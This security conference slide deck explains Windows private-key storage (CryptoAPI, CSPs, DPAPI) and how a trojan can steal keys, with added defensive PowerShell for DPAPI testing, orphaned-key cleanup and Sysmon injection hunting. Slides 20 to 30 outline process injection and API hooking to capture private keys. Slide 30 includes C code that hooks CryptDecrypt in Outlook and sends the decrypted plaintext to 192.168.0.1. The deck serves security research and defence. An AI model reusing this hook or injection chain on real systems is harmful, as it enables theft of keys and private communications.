Catch the key if you can

  1. Catch the key if you can Aurélien BORDES, Éric DETOISIEN

  2. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  3. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  4. Introduction • More and more PKI (Public Key Infrastructure) deployments • Certificates used for digital signature, encrypt/decrypt operations and authentication • Protecting the private key material is critical • What security stands behind the use of this technology in a Microsoft environment?

  5. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  6. What keys? • RSA is an asymmetric-key cryptosystem • It uses two keys: • a public key used for verification or encryption • a private key used for signing or decryption • The public key must be widely distributed (X.509 certificates) • The private key must be kept by its owner in a protected form (software or hardware)

  7. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  8. CryptoAPI provides the cryptographic functions: • Base cryptographic functions • Context functions • Key exchange functions • Certificate encode/decode functions • Encrypt or decrypt • Hash • Certificate store functions • Simplified message functions • Low-level message functions

  9. CSP • Cryptographic Service Provider • Independent modules • Implement the cryptographic functions • Provide protection for private keys • Microsoft CSP: based on DPAPI • Third-party CSP: based on hardware devices

  10. CSP • Cryptographic Provider Types: • PROV_RSA_FULL • PROV_RSA_AES • PROV_RSA_SCHANNEL • PROV_DH_SCHANNEL

  11. Microsoft CSP • PROV_RSA_FULL • Microsoft Base Cryptographic Provider • Microsoft Enhanced/Strong Cryptographic Provider • PROV_RSA_AES • Microsoft AES Cryptographic Provider • PROV_RSA_SCHANNEL • Microsoft RSA/Schannel Cryptographic Provider • PROV_DH_SCHANNEL • Microsoft DSS and Diffie-Hellman/Schannel Cryptographic Provider

  12. DPAPI • Data Protection Application Programming Interface • Provides OS-level data protection services to users and to the system • Protection based on encryption (3DES) • Main idea: session keys are never stored; they are reconstructed for each encryption or decryption operation

  13. DPAPI • Generation of a strong secret protected by the user’s password (PKCS#5: PBKDF2, 3DES and SHA-1) • Stored in the user’s profile: c:\Documents and Settings\<username>\Application Data\Microsoft\Protect\<sid user>\

  14. DPAPI [Diagram, recovered from the slide text] Inputs to the session key: the Master Key (protected with the user credential), « Some random data », application entropy and, optionally, user entropy (an additional password specified by the user). The session key is generated from these inputs and never stored. The resulting DPAPI blob carries in clear a GUID, the master key reference and « Some random data », followed by the encrypted data.

  15. CryptProtectData
      BOOL WINAPI CryptProtectData(
          DATA_BLOB *pDataIn,
          LPCWSTR szDataDescr,
          DATA_BLOB *pOptionalEntropy,
          PVOID pvReserved,
          CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct,
          DWORD dwFlags,
          DATA_BLOB *pDataOut);
      • dwFlags (CRYPTPROTECT_LOCAL_MACHINE): all local users can unprotect the data. Machine keys are protected with this flag

  16. CryptUnprotectData
      BOOL WINAPI CryptUnprotectData(
          DATA_BLOB *pDataIn,
          LPCWSTR *ppszDataDescr,
          DATA_BLOB *pOptionalEntropy,
          PVOID pvReserved,
          CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct,
          DWORD dwFlags,
          DATA_BLOB *pDataOut);

  17. DPAPI Protection levels of DPAPI • Low: protection/unprotection of data is transparent (CRYPTPROTECT_PROMPTSTRUCT prompt flags not set) • Medium: user confirmation required for protection/unprotection operations • High: additional user entropy required: the user must submit a password for protection/unprotection operations
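The three DPAPI inputs the slides have just introduced (the pOptionalEntropy buffer, the CRYPTPROTECT_LOCAL_MACHINE flag and the default user-bound mode) can be exercised from PowerShell through .NET's ProtectedData class, which wraps CryptProtectData and CryptUnprotectData. The script below is an added example, not code from the slides or from their authors; it assumes Windows PowerShell 5.1 on Windows, and the secret and the entropy passphrase are constructed for the demonstration.

```powershell
# Added example: DPAPI "low" and "high" protection levels and the machine scope,
# via System.Security.Cryptography.ProtectedData (wraps CryptProtect/UnprotectData).
Add-Type -AssemblyName System.Security

$secret = [Text.Encoding]::UTF8.GetBytes('constructed sample secret')

# Low level (DPAPI default): bound only to the current user's master key.
$lowBlob = [Security.Cryptography.ProtectedData]::Protect(
    $secret, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)

# High level: additional entropy the caller must present again to unprotect.
# The slides call this the user-supplied password; it is read from a prompt
# here rather than hard-coded, and the BSTR copy is zeroed afterwards.
$passphrase = Read-Host -AsSecureString -Prompt 'Entropy passphrase'
$bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($passphrase)
try {
    $entropy = [Text.Encoding]::UTF8.GetBytes(
        [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr))
} finally {
    [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
}
$highBlob = [Security.Cryptography.ProtectedData]::Protect(
    $secret, $entropy, [Security.Cryptography.DataProtectionScope]::CurrentUser)

# Machine scope (CRYPTPROTECT_LOCAL_MACHINE): every local account can unprotect
# this blob, so it only makes sense for secrets that belong to the machine.
$machineBlob = [Security.Cryptography.ProtectedData]::Protect(
    $secret, $null, [Security.Cryptography.DataProtectionScope]::LocalMachine)

# Unprotecting the low-level blob needs nothing but the user's logon context ...
$plain = [Security.Cryptography.ProtectedData]::Unprotect(
    $lowBlob, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)
"Low-level blob unprotected: $([Text.Encoding]::UTF8.GetString($plain))"
[Array]::Clear($plain, 0, $plain.Length)   # do not leave plaintext lying around

# ... whereas the high-level blob fails without the entropy: the entropy takes
# part in the key derivation, so the same user in the same session is not enough.
try {
    [Security.Cryptography.ProtectedData]::Unprotect(
        $highBlob, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser) | Out-Null
    'Unexpected: high-level blob unprotected without entropy'
} catch [Security.Cryptography.CryptographicException] {
    "High-level blob refused without entropy: $($_.Exception.Message)"
}

[Array]::Clear($entropy, 0, $entropy.Length)
[Array]::Clear($secret, 0, $secret.Length)
```

The medium level (user confirmation through pPromptStruct) is not reachable through ProtectedData, which passes no prompt structure; it needs a direct call to CryptProtectData. Note also that the entropy only helps if it is not stored next to the blob, which is exactly why the slides tie the high level to a password the user types.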

  18. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  19. Software protection under Windows • Protection of private keys with Microsoft’s CSPs is based on DPAPI • Same levels of protection (low, medium, high) • User private keys are protected with DPAPI and stored in the user’s profile: C:\Documents and Settings\<username>\Application Data\Microsoft\Crypto\RSA\<sid user>\ • Machine private keys: C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\

  20. Software protection under Windows • A trojan can read the files (protected private keys) and use the DPAPI functions to unprotect the keys • This works silently (no prompt) only if the protection level is low (the default) • Demo • And with medium/high protection? Perhaps with old-school code injection and API hooking

  21. Delete the keys • When you remove your certificate, the associated private key is not deleted from the disk
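A practical check for the point above is to list the key-container files in the user's RSA key folder that no certificate in the personal store refers to any more. The script is an added example (not from the slides); it assumes Windows PowerShell 5.1, CAPI (CSP-based) keys, for which $cert.PrivateKey is an RSACryptoServiceProvider exposing CspKeyContainerInfo, and the modern location of the folder (%APPDATA%\Microsoft\Crypto\RSA\<SID>, the same folder the slides give under the Documents and Settings profile layout).

```powershell
# Added example: find private-key container files left behind after a
# certificate was deleted from Cert:\CurrentUser\My.
$sid    = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$keyDir = Join-Path $env:APPDATA "Microsoft\Crypto\RSA\$sid"   # per-user RSA containers

# Unique container file names still referenced by a certificate with a CSP key.
# Touching $cert.PrivateKey on a medium/high-protected key raises the DPAPI
# prompt the slides describe, which is expected here.
$referenced = @{}
foreach ($cert in Get-ChildItem Cert:\CurrentUser\My) {
    if (-not $cert.HasPrivateKey) { continue }
    $key = $cert.PrivateKey    # $null for CNG keys, which live under Crypto\Keys instead
    if ($key -is [Security.Cryptography.RSACryptoServiceProvider]) {
        $referenced[$key.CspKeyContainerInfo.UniqueKeyContainerName] = $cert.Thumbprint
    }
}

# Each file in the folder is one DPAPI-protected key container. Anything not
# referenced by a certificate is a candidate leftover and deserves a look.
$orphans = Get-ChildItem -Path $keyDir -File -Force |
    Where-Object { -not $referenced.ContainsKey($_.Name) }

if ($orphans) {
    "Key containers in $keyDir not referenced by any certificate in Cert:\CurrentUser\My:"
    $orphans | Select-Object Name, LastWriteTime, Length | Format-Table -AutoSize
} else {
    "No unreferenced key containers under $keyDir"
}
```

An unreferenced container is not automatically garbage: applications can use a key container without ever binding it to a certificate, so review each file (its timestamp is a good hint) before deleting it. Machine containers under the MachineKeys folder can be reviewed the same way against Cert:\LocalMachine\My from an elevated session.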

  22. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  23. Code injection and API Hooking • Code injection into a Win32 process • OpenProcess • VirtualAllocEx • WriteProcessMemory • CreateRemoteThread • The trojan code is injected into the target process • Possibility to hook interesting APIs

  24. Code injection and API Hooking • API hooking in the target process • Save the API’s first instructions • Patch the API with a JMP to our injected code • Call the saved instructions, then the original API • Interesting APIs to hook • RtlDecryptMemory (SystemFunction041) in Advapi32.dll • CertSerializeCertificateStoreElement

  25. Code injection and API Hooking
      • RtlDecryptMemory
        NTSTATUS RtlDecryptMemory(
            PVOID Memory,
            ULONG MemoryLength,
            ULONG OptionFlags);
      • Memory is a pointer to the encrypted data (private key)
      • If the function succeeds, the decrypted data (plaintext private key) can be read at the Memory location

  26. Code injection and API Hooking
      • CertSerializeCertificateStoreElement
        BOOL WINAPI CertSerializeCertificateStoreElement(
            PCCERT_CONTEXT pCertContext,
            DWORD dwFlags,
            BYTE *pbElement,
            DWORD *pcbElement);
      • typedef struct _CERT_CONTEXT {
            DWORD dwCertEncodingType;
            BYTE *pbCertEncoded;
            DWORD cbCertEncoded;
            PCERT_INFO pCertInfo;
            HCERTSTORE hCertStore;
        } CERT_CONTEXT, *PCERT_CONTEXT;
        typedef const CERT_CONTEXT *PCCERT_CONTEXT;

  27. Code injection and API Hooking • pbCertEncoded is a pointer to the DER-encoded certificate • API hooking is effective for getting an X.509 certificate and its private key • Demo

  28. Can’t catch the key, but the data… • Sometimes it is impossible to get the key (it lives in hardware and cannot be exported) • But it is very easy to get the cleartext • All decryption operations go through the CryptDecrypt function • If you hook this function, you get the plaintext data

  29. CryptDecrypt
      BOOL WINAPI CryptDecrypt(
          HCRYPTKEY hKey,
          HCRYPTHASH hHash,
          BOOL Final,
          DWORD dwFlags,
          BYTE *pbData,      /* plaintext after decryption */
          DWORD *pdwDataLen);

  30. Hooking Outlook
      /* Hook body from the slide: forwards the buffer CryptDecrypt has just
         decrypted (pbData, *pdwDataLen) over TCP. pbData and pdwDataLen are the
         hooked call's arguments; the code runs inside the hooked process. */
      SOCKET s;
      sockaddr_in sa_in;
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      sa_in.sin_family = AF_INET;
      sa_in.sin_addr.s_addr = inet_addr("192.168.0.1");
      sa_in.sin_port = htons(25);
      connect(s, (SOCKADDR *)&sa_in, sizeof(sa_in));   /* the slide passes sa_in itself as the length */
      send(s, (char *)pbData, (int)*pdwDataLen, 0);
      closesocket(s);
      [Diagram, recovered from the slide text: OUTLOOK → decryption of SSL/TLS and S/MIME → CryptoAPI → CSP, with the HOOK placed on CryptDecrypt between CryptoAPI and the CSP]
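Whether the goal is the private key (slides 23 to 27) or the plaintext (slides 28 to 30), the technique needs the same foothold in the victim process: a handle with write and thread-creation rights, then a remote thread. Those two steps are visible in host telemetry, and the script below hunts for them. It is an added example, not part of the presentation; it assumes Sysmon is installed and logging ProcessAccess (event 10) and CreateRemoteThread (event 8) events to its usual channel, which the slides do not mention.

```powershell
# Added example: correlate Sysmon ProcessAccess (10) and CreateRemoteThread (8)
# events into candidate injection chains (OpenProcess -> VirtualAllocEx ->
# WriteProcessMemory -> CreateRemoteThread).

# Access rights a remote-injection caller needs on the target process handle.
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_OPERATION  = 0x0008
$PROCESS_VM_WRITE      = 0x0020
$injectMask = $PROCESS_CREATE_THREAD -bor $PROCESS_VM_OPERATION -bor $PROCESS_VM_WRITE

function Get-EventData {
    # Flatten the <EventData><Data Name="..."> pairs of one event into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $h = @{}
    foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
    $h
}

$log   = 'Microsoft-Windows-Sysmon/Operational'
$since = (Get-Date).AddHours(-24)

# Event 10: a process opened another process with all the rights injection needs.
$opens = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 10; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object { Get-EventData $_ } |
    Where-Object {
        $_.SourceImage -ne $_.TargetImage -and
        (([Convert]::ToInt32($_.GrantedAccess, 16)) -band $injectMask) -eq $injectMask
    }

# Event 8: a thread was started in another process. A stub written with
# WriteProcessMemory is not backed by a loaded module, so StartModule and
# StartFunction are typically empty for the thread that runs it.
$threads = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 8; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object { Get-EventData $_ } |
    Where-Object { $_.SourceImage -ne $_.TargetImage }

# Correlate: the same source/target pair in both events is the full chain.
foreach ($t in $threads) {
    $handleOpen = $opens | Where-Object {
        $_.SourceImage -eq $t.SourceImage -and $_.TargetImage -eq $t.TargetImage
    }
    [pscustomobject]@{
        Time          = $t.UtcTime
        Source        = $t.SourceImage
        Target        = $t.TargetImage
        StartAddress  = $t.StartAddress
        StartModule   = $t.StartModule
        StartFunction = $t.StartFunction
        HandleOpened  = [bool]$handleOpen
        Unbacked      = [string]::IsNullOrEmpty($t.StartModule)
    }
}
```

Legitimate software (debuggers, some security agents) also creates remote threads, so the output is a worklist rather than a verdict; rows with an empty StartModule and a matching handle open on a process that handles keys or mail are the ones to look at first. On the preventive side, the slides' conclusion applies: none of this works without code running on the workstation at the user's privilege level.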

  31. Summary • Introduction • What keys? • CryptoAPI / DPAPI • Software protection under Windows • Code injection and API Hooking • Conclusion

  32. Conclusion • Private storage on Windows is not secure • Token and smartcard are better but beware the spyware… • No workstation compromise means no compromise of your keys • The security needs to be everywhere
